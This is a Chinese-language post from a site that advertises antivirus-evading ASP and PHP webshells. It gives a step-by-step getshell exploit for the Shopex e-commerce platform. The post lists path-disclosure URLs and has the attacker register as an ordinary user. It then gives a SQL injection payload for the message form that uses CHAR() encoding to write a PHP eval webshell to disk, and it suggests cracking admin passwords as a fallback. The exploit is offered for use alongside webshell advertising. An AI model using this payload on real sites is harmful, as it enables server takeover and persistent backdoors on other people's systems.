火热虚拟主机提权专用Asp大马火热推荐免杀Asp木马隐藏防删 火热最经典Php大马解密版

火爆最新更新暗组免杀Php大马火爆免杀超越神界Asp大马下载 火爆免杀Asp草泥马4.0版

接单交流QQ群:136549649

Shopex前台普通用户getshell最新漏洞

2012-10-04

利用方法:

第一个:想办法找到目标网站的绝对路径

 

http://www.mumaasp.com/install/svinfo.php?phpinfo=true

http://www.mumaasp.com/core/api/shop_api.php

http://www.mumaasp.com/core/api/site/2.0/api_b2b_2_0_cat.php

http://www.mumaasp.com/core/api/site/2.0/api_b2b_2_0_goodstype.php

http://www.mumaasp.com/core/api/site/2.0/api_b2b_2_0_brand.php

shopex存在很多爆路径的漏洞,请自行研究。

第二个:注册一个普通用户

http://www.mumaasp.com/?passport-signup.html

第三个:

发送消息

http://www.mumaasp.com/?member-send.html

代码

mumaas.com' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #

一句话的密码是#

这个漏洞,对于mysql用户权限有要求的,对于导出的目录也得有可写的要求,服务器环境也有要求。

如果无法getshell的话,也可以尝试注入,破密码进后台也一样

shell图

  • Asp免杀大马发布,转载请注明 : http://www.mumaasp.com/103.html
  • 分类:ShopexGetshell | 标签: | 2,131人 浏览

    发表评论

    电子邮件地址不会被公开。 必填项已用 * 标注

    *

    您可以使用这些 HTML 标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>